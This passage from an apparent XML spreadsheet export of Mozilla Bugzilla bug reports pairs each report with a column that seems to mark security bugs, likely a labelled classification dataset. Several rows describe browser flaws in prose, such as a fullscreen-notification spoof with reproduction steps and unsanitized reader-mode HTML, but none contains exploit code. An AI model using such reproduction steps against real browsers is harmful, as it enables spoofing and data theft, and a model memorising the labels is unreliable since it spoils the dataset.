The statusbarDateFormat ends with a '.', and the statusbarLabel has a ',' separator, which makes the dates look funny with oct., operator.
I guess the '.' can just go.
This affects all of 1.1 -&gt; trunk.
+++ This bug was initially created as a clone of Bug #929913 +++
DEFECT DESCRIPTION:
 REDUNDANT FULL STOP AFTER THE MONTH
  REPRODUCING PROCEDURES:
 1. Open the notifications.
 2. Look at the date in upper left corner. There's a redundant full stop after the month name.
  EXPECTED BEHAVIOUR:
  ASSOCIATE SPECIFICATION:
  TEST PLAN REFERENCE:
  TOOLS AND PLATFORMS USED:
  USER IMPACT:
  REPRODUCING RATE:
 100%
  For FT PR, Please list reference mobile's behavior:</t>
        </is>
      </c>
      <c r="X3328" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3329">
      <c r="A3329" t="n">
        <v>1063733</v>
      </c>
      <c r="B3329" t="inlineStr">
        <is>
          <t>2014-09-05 13:10:28 -0700</t>
        </is>
      </c>
      <c r="C3329" t="inlineStr">
        <is>
          <t>Apparent use of uninitialized memory when rendering truncated GIFs to &lt;canvas&gt;</t>
        </is>
      </c>
      <c r="D3329" t="inlineStr">
        <is>
          <t>2024-05-30 08:37:00 -0700</t>
        </is>
      </c>
      <c r="E3329" t="n">
        <v>1</v>
      </c>
      <c r="F3329" t="n">
        <v>1</v>
      </c>
      <c r="G3329" t="n">
        <v>3</v>
      </c>
      <c r="H3329" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3329" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3329" t="inlineStr">
        <is>
          <t>Graphics: ImageLib</t>
        </is>
      </c>
      <c r="K3329" t="inlineStr">
        <is>
          <t>32 Branch</t>
        </is>
      </c>
      <c r="L3329" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M3329" t="inlineStr">
        <is>
          <t>Windows 7</t>
        </is>
      </c>
      <c r="N3329" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3329" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3329" t="inlineStr">
        <is>
          <t>[adv-main33+]</t>
        </is>
      </c>
      <c r="Q3329" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3329" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3329" t="inlineStr">
        <is>
          <t>mozilla35</t>
        </is>
      </c>
      <c r="T3329" t="n">
        <v>1</v>
      </c>
      <c r="U3329" t="n">
        <v>0</v>
      </c>
      <c r="V3329" t="n">
        <v>31</v>
      </c>
      <c r="W3329" t="inlineStr">
        <is>
          <t>Hey,
This seems reminiscent of bug 1045977, but affects 32.0:
http://lcamtuf.coredump.cx/ffgif2/
The page creates multiple Image() instances of a truncated GIF (./id:000158,orig:000158,src:000140.gif) repeatedly and then renders them on &lt;canvas&gt;. In my testing, this results in the missing (transparent) region being rendered in 2-8 distinct ways, suggesting the use of uninitialized memory (and the risk of leaking secrets across domains).
/mz</t>
        </is>
      </c>
      <c r="X3329" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3330">
      <c r="A3330" t="n">
        <v>778582</v>
      </c>
      <c r="B3330" t="inlineStr">
        <is>
          <t>2012-07-29 14:23:01 -0700</t>
        </is>
      </c>
      <c r="C3330" t="inlineStr">
        <is>
          <t>reader mode chrome xss</t>
        </is>
      </c>
      <c r="D3330" t="inlineStr">
        <is>
          <t>2024-05-29 16:03:14 -0700</t>
        </is>
      </c>
      <c r="E3330" t="n">
        <v>1</v>
      </c>
      <c r="F3330" t="n">
        <v>1</v>
      </c>
      <c r="G3330" t="n">
        <v>6</v>
      </c>
      <c r="H3330" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I3330" t="inlineStr">
        <is>
          <t>Firefox for Android Graveyard</t>
        </is>
      </c>
      <c r="J3330" t="inlineStr">
        <is>
          <t>Reader View</t>
        </is>
      </c>
      <c r="K3330" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3330" t="inlineStr">
        <is>
          <t>ARM</t>
        </is>
      </c>
      <c r="M3330" t="inlineStr">
        <is>
          <t>Android</t>
        </is>
      </c>
      <c r="N3330" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3330" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3330" t="inlineStr">
        <is>
          <t>[advisory-tracking+]</t>
        </is>
      </c>
      <c r="Q3330" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3330" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3330" t="inlineStr">
        <is>
          <t>Firefox 17</t>
        </is>
      </c>
      <c r="T3330" t="n">
        <v>1</v>
      </c>
      <c r="U3330" t="n">
        <v>0</v>
      </c>
      <c r="V3330" t="n">
        <v>80</v>
      </c>
      <c r="W3330" t="inlineStr">
        <is>
          <t>User Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:14.0) Gecko/20100101 Firefox/14.0.1
Build ID: 20120713134347
Steps to reproduce:
Reader mode copies the article into a document with chrome privileges via innerHTML without doing much sanitization.
http://mxr.mozilla.org/mozilla-central/source/mobile/android/chrome/content/aboutReader.js?force=1#294</t>
        </is>
      </c>
      <c r="X3330" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3331">
      <c r="A3331" t="n">
        <v>641052</v>
      </c>
      <c r="B3331" t="inlineStr">
        <is>
          <t>2011-03-11 12:08:25 -0800</t>
        </is>
      </c>
      <c r="C3331" t="inlineStr">
        <is>
          <t>NSS_NoDB_Init should not try to open /pkcs11.txt and /secmod.db</t>
        </is>
      </c>
      <c r="D3331" t="inlineStr">
        <is>
          <t>2011-10-27 12:05:08 -0700</t>
        </is>
      </c>
      <c r="E3331" t="n">
        <v>1</v>
      </c>
      <c r="F3331" t="n">
        <v>1</v>
      </c>
      <c r="G3331" t="n">
        <v>3</v>
      </c>
      <c r="H3331" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3331" t="inlineStr">
        <is>
          <t>NSS</t>
        </is>
      </c>
      <c r="J3331" t="inlineStr">
        <is>
          <t>Libraries</t>
        </is>
      </c>
      <c r="K3331" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3331" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3331" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3331" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3331" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3331" t="inlineStr">
        <is>
          <t>[sg:moderate]</t>
        </is>
      </c>
      <c r="Q3331" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3331" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3331" t="inlineStr">
        <is>
          <t>3.13</t>
        </is>
      </c>
      <c r="T3331" t="n">
        <v>1</v>
      </c>
      <c r="U3331" t="n">
        <v>0</v>
      </c>
      <c r="V3331" t="n">
        <v>11</v>
      </c>
      <c r="W3331" t="inlineStr">
        <is>
          <t>Although NSS_NoDB_Init takes a 'configdir' argument, it ignores
the argument:
http://bonsai.mozilla.org/cvsblame.cgi?file=mozilla/security/nss/lib/nss/nssinit.c&amp;rev=1.106&amp;mark=838#834
A coworker of mine ran strace on a simple program that calls
NSS_NoDB_Init(NULL).  strace showed that NSS_NoDB_Init tries
to open /pkcs11.txt and /secmod.db.
NSS_NoDB_Init should not try to open /pkcs11.txt and /secmod.db
because those are not the intended file paths.</t>
        </is>
      </c>
      <c r="X3331" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3332">
      <c r="A3332" t="n">
        <v>1008764</v>
      </c>
      <c r="B3332" t="inlineStr">
        <is>
          <t>2014-05-11 15:39:16 -0700</t>
        </is>
      </c>
      <c r="C3332" t="inlineStr">
        <is>
          <t>Add a web service to create and update Flag types</t>
        </is>
      </c>
      <c r="D3332" t="inlineStr">
        <is>
          <t>2015-12-13 06:54:45 -0800</t>
        </is>
      </c>
      <c r="E3332" t="n">
        <v>1</v>
      </c>
      <c r="F3332" t="n">
        <v>1</v>
      </c>
      <c r="G3332" t="n">
        <v>4</v>
      </c>
      <c r="H3332" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I3332" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J3332" t="inlineStr">
        <is>
          <t>WebService</t>
        </is>
      </c>
      <c r="K3332" t="inlineStr">
        <is>
          <t>4.4</t>
        </is>
      </c>
      <c r="L3332" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3332" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3332" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3332" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3332" t="inlineStr"/>
      <c r="Q3332" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R3332" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3332" t="inlineStr">
        <is>
          <t>Bugzilla 5.0</t>
        </is>
      </c>
      <c r="T3332" t="n">
        <v>1</v>
      </c>
      <c r="U3332" t="n">
        <v>0</v>
      </c>
      <c r="V3332" t="n">
        <v>13</v>
      </c>
      <c r="W3332" t="inlineStr">
        <is>
          <t>SSIA really. This is a bug to add a web service to create and update flag types for users that have the correct privileges to do so. Patch will be coming later this week (brc already have FlagTypes.create, but not .update)</t>
        </is>
      </c>
      <c r="X3332" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3333">
      <c r="A3333" t="n">
        <v>517637</v>
      </c>
      <c r="B3333" t="inlineStr">
        <is>
          <t>2009-09-18 20:59:04 -0700</t>
        </is>
      </c>
      <c r="C3333" t="inlineStr">
        <is>
          <t>TM: "Assertion failure: sprop-&gt;methodValue() == prev"</t>
        </is>
      </c>
      <c r="D3333" t="inlineStr">
        <is>
          <t>2009-11-20 11:09:10 -0800</t>
        </is>
      </c>
      <c r="E3333" t="n">
        <v>1</v>
      </c>
      <c r="F3333" t="n">
        <v>1</v>
      </c>
      <c r="G3333" t="n">
        <v>3</v>
      </c>
      <c r="H3333" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3333" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3333" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K3333" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3333" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3333" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3333" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3333" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3333" t="inlineStr">
        <is>
          <t>fixed-in-tracemonkey</t>
        </is>
      </c>
      <c r="Q3333" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3333" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S3333" t="inlineStr">
        <is>
          <t>mozilla1.9.2</t>
        </is>
      </c>
      <c r="T3333" t="n">
        <v>1</v>
      </c>
      <c r="U3333" t="n">
        <v>0</v>
      </c>
      <c r="V3333" t="n">
        <v>16</v>
      </c>
      <c r="W3333" t="inlineStr">
        <is>
          <t>js&gt; for (var j = 0; j &lt; 7; ++j) uneval({x: function () {}})
Assertion failure: sprop-&gt;methodValue() == prev, at ../jsscope.cpp:1583
js&gt; for (var j = 0; j &lt; 7; ++j) ({x: function () {}}).x 
Assertion failure: sprop-&gt;methodValue() == *vp, at ../jsscope.h:676
Doesn't crash opt.  Requires -j.  TM rev 32d61518f755+.</t>
        </is>
      </c>
      <c r="X3333" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3334">
      <c r="A3334" t="n">
        <v>389422</v>
      </c>
      <c r="B3334" t="inlineStr">
        <is>
          <t>2007-07-24 10:31:55 -0700</t>
        </is>
      </c>
      <c r="C3334" t="inlineStr">
        <is>
          <t>Upgrade try1-win32-slave to new windows ref platform</t>
        </is>
      </c>
      <c r="D3334" t="inlineStr">
        <is>
          <t>2013-08-12 21:54:08 -0700</t>
        </is>
      </c>
      <c r="E3334" t="n">
        <v>1</v>
      </c>
      <c r="F3334" t="n">
        <v>1</v>
      </c>
      <c r="G3334" t="n">
        <v>5</v>
      </c>
      <c r="H3334" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I3334" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J3334" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K3334" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L3334" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3334" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3334" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3334" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3334" t="inlineStr">
        <is>
          <t>in progress</t>
        </is>
      </c>
      <c r="Q3334" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R3334" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3334" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3334" t="n">
        <v>1</v>
      </c>
      <c r="U3334" t="n">
        <v>0</v>
      </c>
      <c r="V3334" t="n">
        <v>3</v>
      </c>
      <c r="W3334" t="inlineStr">
        <is>
          <t>See summary.</t>
        </is>
      </c>
      <c r="X3334" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3335">
      <c r="A3335" t="n">
        <v>1735071</v>
      </c>
      <c r="B3335" t="inlineStr">
        <is>
          <t>2021-10-10 11:31:03 -0700</t>
        </is>
      </c>
      <c r="C3335" t="inlineStr">
        <is>
          <t>reportValidity allow focus stealing can be abused to overlap fullscreen security notification</t>
        </is>
      </c>
      <c r="D3335" t="inlineStr">
        <is>
          <t>2024-05-30 10:49:33 -0700</t>
        </is>
      </c>
      <c r="E3335" t="n">
        <v>1</v>
      </c>
      <c r="F3335" t="n">
        <v>1</v>
      </c>
      <c r="G3335" t="n">
        <v>3</v>
      </c>
      <c r="H3335" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3335" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3335" t="inlineStr">
        <is>
          <t>DOM: Core &amp; HTML</t>
        </is>
      </c>
      <c r="K3335" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3335" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3335" t="inlineStr">
        <is>
          <t>Windows</t>
        </is>
      </c>
      <c r="N3335" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3335" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3335" t="inlineStr">
        <is>
          <t>[reporter-external] [client-bounty-form][sec-survey][adv-main96+][adv-ESR91.5+]</t>
        </is>
      </c>
      <c r="Q3335" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3335" t="inlineStr">
        <is>
          <t>S2</t>
        </is>
      </c>
      <c r="S3335" t="inlineStr">
        <is>
          <t>97 Branch</t>
        </is>
      </c>
      <c r="T3335" t="n">
        <v>1</v>
      </c>
      <c r="U3335" t="n">
        <v>0</v>
      </c>
      <c r="V3335" t="n">
        <v>33</v>
      </c>
      <c r="W3335" t="inlineStr">
        <is>
          <t>Created attachment 9245159
spoof-fullscreen-reportvalidity-focus.html
After creating popup with `window.open` then call `requestValidity` on parent window or child window, on Windows OS the focus will be switched from popup window to the parent window or vice versa, allowing pop-under popup window and focus stealing.
Normally after request fullscreen then subsequently call `childWindow.focus()` to overlap fullscreen notification, it will be disallowed, the console will show warning message `Opening multiple popups was blocked due to lack of user activation.` or `Exited fullscreen because a window was focused.`
Interestingly when using `requestValidity` to switch focus to child window after requesting fullscreen, it will be allowed, the fullscreen notification will be overlapped with child window.
## Steps to reproduce:
1. Visit attached spoof-fullscreen-requestvalidity-focus.html
2. Click "New Window" button
3. After child window launched, the parent window will regain focus with validation message "Spoof window is ready!"
4. Click "Spoof" button
5. Fullscreen notification will be overlapped with child window</t>
        </is>
      </c>
      <c r="X3335" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3336">
      <c r="A3336" t="n">
        <v>926361</v>
      </c>
      <c r="B3336" t="inlineStr">
        <is>
          <t>2013-10-14 03:47:12 -0700</t>
        </is>
      </c>
      <c r="C3336" t="inlineStr">
        <is>
          <t>ASAN use-after-free in nsNodeUtils::LastRelease on anonymous node from ShowInlineTableEditingUI</t>
        </is>
      </c>
      <c r="D3336" t="inlineStr">
        <is>
          <t>2015-02-25 20:20:35 -0800</t>
        </is>
      </c>
      <c r="E3336" t="n">
        <v>1</v>
      </c>
      <c r="F3336" t="n">
        <v>1</v>
      </c>
      <c r="G3336" t="n">
        <v>3</v>
      </c>
      <c r="H3336" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3336" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3336" t="inlineStr">
        <is>
          <t>DOM: Editor</t>
        </is>
      </c>
      <c r="K3336" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3336" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M3336" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N3336" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3336" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3336" t="inlineStr">
        <is>
          <t>[asan][adv-main26+][adv-esr24.2+]</t>
        </is>
      </c>
      <c r="Q3336" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3336" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3336" t="inlineStr">
        <is>
          <t>mozilla27</t>
        </is>
      </c>
      <c r="T3336" t="n">
        <v>1</v>
      </c>
      <c r="U3336" t="n">
        <v>0</v>
      </c>
      <c r="V3336" t="n">
        <v>17</v>
      </c>
      <c r="W3336" t="inlineStr">
        <is>
          <t>Created attachment 816507
crash.html
The attached testcase crashes the latest nightly ASAN build. It requires domFuzzLite https://www.squarefree.com/extensions/domFuzzLite3.xpi</t>
        </is>
      </c>
      <c r="X3336" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3337">
      <c r="A3337" t="n">
        <v>1156480</v>
      </c>
      <c r="B3337" t="inlineStr">
        <is>
          <t>2015-04-20 14:29:56 -0700</t>
        </is>
      </c>
      <c r="C3337" t="inlineStr">
        <is>
          <t>Update infographics.json with updated data from Lorax data spreadsheet</t>
        </is>
      </c>
      <c r="D3337" t="inlineStr">
        <is>
          <t>2015-05-04 16:40:23 -0700</t>
        </is>
      </c>
      <c r="E3337" t="n">
        <v>1</v>
      </c>
      <c r="F3337" t="n">
        <v>1</v>
      </c>
      <c r="G3337" t="n">
        <v>5</v>
      </c>
      <c r="H3337" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I3337" t="inlineStr">
        <is>
          <t>Websites</t>
        </is>
      </c>
      <c r="J3337" t="inlineStr">
        <is>
          <t>Shape of the Web</t>
        </is>
      </c>
      <c r="K3337" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3337" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3337" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3337" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3337" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3337" t="inlineStr"/>
      <c r="Q3337" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3337" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3337" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3337" t="n">
        <v>1</v>
      </c>
      <c r="U3337" t="n">
        <v>0</v>
      </c>
      <c r="V3337" t="n">
        <v>11</v>
      </c>
      <c r="W3337" t="inlineStr">
        <is>
          <t>This bug is to update 
https://raw.githubusercontent.com/mozilla/lorax/master/src/data/i18n/infographics.json
With the content from 
https://docs.google.com/a/mozilla.com/spreadsheets/d/1a8paNpwBciQh2hihDh0xq2uKmbHDTFjgJnw7h87N8AA/edit</t>
        </is>
      </c>
      <c r="X3337" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3338">
      <c r="A3338" t="n">
        <v>711830</v>
      </c>
      <c r="B3338" t="inlineStr">
        <is>
          <t>2011-12-18 06:37:40 -0800</t>
        </is>
      </c>
      <c r="C3338" t="inlineStr">
        <is>
          <t>Add Thunderbird 9.0 and 3.1.17 to bouncer</t>
        </is>
      </c>
      <c r="D3338" t="inlineStr">
        <is>
          <t>2013-08-12 21:54:08 -0700</t>
        </is>
      </c>
      <c r="E3338" t="n">
        <v>1</v>
      </c>
      <c r="F3338" t="n">
        <v>1</v>
      </c>
      <c r="G3338" t="n">
        <v>5</v>
      </c>
      <c r="H3338" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I3338" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J3338" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K3338" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L3338" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3338" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3338" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3338" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3338" t="inlineStr"/>
      <c r="Q3338" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R3338" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3338" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3338" t="n">
        <v>1</v>
      </c>
      <c r="U3338" t="n">
        <v>0</v>
      </c>
      <c r="V3338" t="n">
        <v>3</v>
      </c>
      <c r="W3338" t="inlineStr">
        <is>
          <t>The Thunderbird team is going to release Thunderbird 9.0 and 3.1.17 on 20th December 2011, and we'd like to have the main builds added to bouncer for downloads.
The relevant URLs to add are (bouncer and FTP):
Thunderbird-9.0                     osx   /thunderbird/releases/9.0/mac/:lang/Thunderbird%209.0.dmg
Thunderbird-9.0                     linux /thunderbird/releases/9.0/linux-i686/:lang/thunderbird-9.0.tar.bz2
Thunderbird-9.0                     linux64 /thunderbird/releases/9.0/linux-x86_64/:lang/thunderbird-9.0.tar.bz2
Thunderbird-9.0                     win   /thunderbird/releases/9.0/win32/:lang/Thunderbird%20Setup%209.0.exe
Thunderbird-9.0-Complete            osx   /thunderbird/releases/9.0/update/mac/:lang/thunderbird-9.0.complete.mar
Thunderbird-9.0-Complete            linux /thunderbird/releases/9.0/update/linux-i686/:lang/thunderbird-9.0.complete.mar
Thunderbird-9.0-Complete            linux64 /thunderbird/releases/9.0/update/linux-x86_64/:lang/thunderbird-9.0.complete.mar
Thunderbird-9.0-Complete            win   /thunderbird/releases/9.0/update/win32/:lang/thunderbird-9.0.complete.mar
Thunderbird-9.0-Partial-8.0  osx   /thunderbird/releases/9.0/update/mac/:lang/thunderbird-8.0-9.0.partial.mar
Thunderbird-9.0-Partial-8.0  linux /thunderbird/releases/9.0/update/linux-i686/:lang/thunderbird-8.0-9.0.partial.mar
Thunderbird-9.0-Partial-8.0  linux64 /thunderbird/releases/9.0/update/linux-x86_64/:lang/thunderbird-8.0-9.0.partial.mar
Thunderbird-9.0-Partial-8.0  win   /thunderbird/releases/9.0/update/win32/:lang/thunderbird-8.0-9.0.partial.mar
Thunderbird-3.1.17                     osx   /thunderbird/releases/3.1.17/mac/:lang/Thunderbird%203.1.17.dmg
Thunderbird-3.1.17                     linux /thunderbird/releases/3.1.17/linux-i686/:lang/thunderbird-3.1.17.tar.bz2
Thunderbird-3.1.17                     linux64 /thunderbird/releases/3.1.17/linux-x86_64/:lang/thunderbird-3.1.17.tar.bz2
Thunderbird-3.1.17                     win   /thunderbird/releases/3.1.17/win32/:lang/Thunderbird%20Setup%203.1.17.exe
Thunderbird-3.1.17-Complete            osx   /thunderbird/releases/3.1.17/update/mac/:lang/thunderbird-3.1.17.complete.mar
Thunderbird-3.1.17-Complete            linux /thunderbird/releases/3.1.17/update/linux-i686/:lang/thunderbird-3.1.17.complete.mar
Thunderbird-3.1.17-Complete            linux64 /thunderbird/releases/3.1.17/update/linux-x86_64/:lang/thunderbird-3.1.17.complete.mar
Thunderbird-3.1.17-Complete            win   /thunderbird/releases/3.1.17/update/win32/:lang/thunderbird-3.1.17.complete.mar
Thunderbird-3.1.17-Partial-3.1.16  osx   /thunderbird/releases/3.1.17/update/mac/:lang/thunderbird-3.1.16-3.1.17.partial.mar
Thunderbird-3.1.17-Partial-3.1.16  linux /thunderbird/releases/3.1.17/update/linux-i686/:lang/thunderbird-3.1.16-3.1.17.partial.mar
Thunderbird-3.1.17-Partial-3.1.16  linux64 /thunderbird/releases/3.1.17/update/linux-x86_64/:lang/thunderbird-3.1.16-3.1.17.partial.mar
Thunderbird-3.1.17-Partial-3.1.16  win   /thunderbird/releases/3.1.17/update/win32/:lang/thunderbird-3.1.16-3.1.17.partial.mar</t>
        </is>
      </c>
      <c r="X3338" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3339">
      <c r="A3339" t="n">
        <v>819775</v>
      </c>
      <c r="B3339" t="inlineStr">
        <is>
          <t>2012-12-09 08:46:00 -0800</t>
        </is>
      </c>
      <c r="C3339" t="inlineStr">
        <is>
          <t>js_InitRandom: Don't use pointer values in seeding the random number generator</t>
        </is>
      </c>
      <c r="D3339" t="inlineStr">
        <is>
          <t>2014-11-19 19:39:25 -0800</t>
        </is>
      </c>
      <c r="E3339" t="n">
        <v>1</v>
      </c>
      <c r="F3339" t="n">
        <v>1</v>
      </c>
      <c r="G3339" t="n">
        <v>3</v>
      </c>
      <c r="H3339" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3339" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3339" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K3339" t="inlineStr">
        <is>
          <t>Other Branch</t>
        </is>
      </c>
      <c r="L3339" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3339" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3339" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3339" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3339" t="inlineStr">
        <is>
          <t>[js:t][adv-main21+]</t>
        </is>
      </c>
      <c r="Q3339" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3339" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3339" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3339" t="n">
        <v>1</v>
      </c>
      <c r="U3339" t="n">
        <v>0</v>
      </c>
      <c r="V3339" t="n">
        <v>5</v>
      </c>
      <c r="W3339" t="inlineStr">
        <is>
          <t>Follow-up to bug 811355.
We have this code (word-wrapped for bugzilla):
&gt; void
&gt; js_InitRandom(JSContext *cx)
&gt; {
&gt;     /*
&gt;      * Set the seed from current time. Since we have a RNG per context and we
&gt;      * often bring up several contexts at the same time, we xor in some
&gt;      * additional values, namely the context and its successor. We don't just
&gt;      * use the context because it might be possible to reverse engineer the
&gt;      * context pointer if one guesses the time right.
&gt;      */
&gt;     random_setSeed(&amp;cx-&gt;rngSeed,
&gt;         (PRMJ_Now() / 1000) ^ int64_t(cx) ^ int64_t(cx-&gt;getNext()));
&gt; }
cx-&gt;getNext() is always null here.
This is not exploitable by itself, but I'd be shocked if an attacker couldn't recover cx. sec-moderate.</t>
        </is>
      </c>
      <c r="X3339" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3340">
      <c r="A3340" t="n">
        <v>504862</v>
      </c>
      <c r="B3340" t="inlineStr">
        <is>
          <t>2009-07-17 11:09:32 -0700</t>
        </is>
      </c>
      <c r="C3340" t="inlineStr">
        <is>
          <t>XSS due to window.dialogArguments accessible cross-domain (MSVR-09-0047 / ZDI-CAN-535)</t>
        </is>
      </c>
      <c r="D3340" t="inlineStr">
        <is>
          <t>2010-03-18 11:01:51 -0700</t>
        </is>
      </c>
      <c r="E3340" t="n">
        <v>1</v>
      </c>
      <c r="F3340" t="n">
        <v>1</v>
      </c>
      <c r="G3340" t="n">
